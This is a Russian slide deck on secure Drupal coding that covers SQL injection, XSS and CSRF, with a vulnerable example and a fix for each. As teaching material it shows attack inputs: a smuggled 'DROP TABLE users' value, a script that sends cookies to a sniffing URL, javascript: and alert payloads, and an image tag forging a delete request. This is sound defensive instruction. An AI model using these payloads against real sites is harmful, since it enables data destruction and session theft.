🗊Безопасный код © Александр Швец neochief@drupal.pro

Категория: Технологии
Нажмите для полного просмотра!
Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №1Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №2Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №3Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №4Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №5Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №6Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №7Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №8Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №9Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №10Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №11Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №12Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №13Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №14Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №15Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №16Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №17Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №18Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №19Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №20Безопасный код  © Александр Швец  neochief@drupal.pro, слайд №21

Вы можете ознакомиться и скачать Безопасный код © Александр Швец neochief@drupal.pro. Презентация содержит 21 слайдов. Презентации для любого класса можно скачать бесплатно. Если материал и наш сайт презентаций Вам понравились – поделитесь им с друзьями с помощью социальных кнопок и добавьте в закладки в своем браузере.

Слайды и текст этой презентации


Слайд 1





Безопасный код
© Александр Швец
neochief@drupal.pro
Описание слайда:
Безопасный код © Александр Швец neochief@drupal.pro

Слайд 2





SQL инъекция
$result = db_query('
SELECT *
FROM users
WHERE id = '" + $userID + "';
‘);
Описание слайда:
SQL инъекция $result = db_query(' SELECT * FROM users WHERE id = '" + $userID + "'; ‘);

Слайд 3






$userID  = "5;DROP TABLE users";
Описание слайда:
$userID = "5;DROP TABLE users";

Слайд 4






$result = db_query('
SELECT *
FROM users
WHERE id = 5;DROP TABLE users;
');
Описание слайда:
$result = db_query(' SELECT * FROM users WHERE id = 5;DROP TABLE users; ');

Слайд 5





Неправильно
$result = db_query('
SELECT *
FROM users
WHERE id = '" + $userID + "';
‘);
Описание слайда:
Неправильно $result = db_query(' SELECT * FROM users WHERE id = '" + $userID + "'; ‘);

Слайд 6





Правильно
$result = db_query('
SELECT *
FROM users
WHERE id = %d
‘, $userID);
Описание слайда:
Правильно $result = db_query(' SELECT * FROM users WHERE id = %d ‘, $userID);

Слайд 7





Cross-site scripting (XSS)

Основная проблема — кража пользовательских cookies, с помощью которых производится неавторизированный вход на сайт.
Описание слайда:
Cross-site scripting (XSS) Основная проблема — кража пользовательских cookies, с помощью которых производится неавторизированный вход на сайт.

Слайд 8





Как крадутся cookie
<script>
document.write(
  ‘<img src=“http://site.com/sniff.php?c=‘ + document.cookie +
  ’/>’
);
</script>
Описание слайда:
Как крадутся cookie <script> document.write( ‘<img src=“http://site.com/sniff.php?c=‘ + document.cookie + ’/>’ ); </script>

Слайд 9





Уязвимость в реальной жизни

$output =
  ‘<a href=“’. $url .’”>’. $title .’</a>’;
Описание слайда:
Уязвимость в реальной жизни $output = ‘<a href=“’. $url .’”>’. $title .’</a>’;

Слайд 10






$title = “</a>
<script>alert(document.cookie)</script><a>”;
Описание слайда:
$title = “</a> <script>alert(document.cookie)</script><a>”;

Слайд 11








<a href=“…”></a>
<script>alert(document.cookie)</script>
<a></a>
Описание слайда:
<a href=“…”></a> <script>alert(document.cookie)</script> <a></a>

Слайд 12






$url = “javascript:alert(document.cookie)”;
Описание слайда:
$url = “javascript:alert(document.cookie)”;

Слайд 13








<a href=“javascript:alert(document.cookie)”>…</a>
Описание слайда:
<a href=“javascript:alert(document.cookie)”>…</a>

Слайд 14





Неправильно

$output =
  ‘<a href=“’. $url .’”>’. $title .’</a>’;
Описание слайда:
Неправильно $output = ‘<a href=“’. $url .’”>’. $title .’</a>’;

Слайд 15





Правильно

$output =
  ‘<a href=“’. check_url($url) .’”>’. check_plain($title) .’</a>’;
Описание слайда:
Правильно $output = ‘<a href=“’. check_url($url) .’”>’. check_plain($title) .’</a>’;

Слайд 16





Еще лучше

$output = l($title, $url);
Описание слайда:
Еще лучше $output = l($title, $url);

Слайд 17





Фильтрация ввода — лечение от XSS
check_plain()
check_markup()
ckeck_url()
t()
filter_xss_admin()
Описание слайда:
Фильтрация ввода — лечение от XSS check_plain() check_markup() ckeck_url() t() filter_xss_admin()

Слайд 18





Подделка межсайтовых запросов (CSRF)
<a href=“http://site.com/fast_delete_node”>
Быстро удалить документ
</a>
Описание слайда:
Подделка межсайтовых запросов (CSRF) <a href=“http://site.com/fast_delete_node”> Быстро удалить документ </a>

Слайд 19





А что если?
<img src=“http://site.com/fast_delete_node”/>
Описание слайда:
А что если? <img src=“http://site.com/fast_delete_node”/>

Слайд 20





Лечение CSRF
Управляющий код должен выполняться только в обработчиках  форм, либо с проверкой токенов.
Описание слайда:
Лечение CSRF Управляющий код должен выполняться только в обработчиках форм, либо с проверкой токенов.

Слайд 21





Спасибо за внимание!
Контакты:
Александр Швец
neochief@drupal.pro
Ссылки:
http://drupaldance.com/lessons/secure-code-user-input
http://drupaldance.com/lessons/secure-code-database-layer
http://drupaldance.com/lessons/secure-code-csrf
Описание слайда:
Спасибо за внимание! Контакты: Александр Швец neochief@drupal.pro Ссылки: http://drupaldance.com/lessons/secure-code-user-input http://drupaldance.com/lessons/secure-code-database-layer http://drupaldance.com/lessons/secure-code-csrf



Похожие презентации
Mypresentation.ru
Загрузить презентацию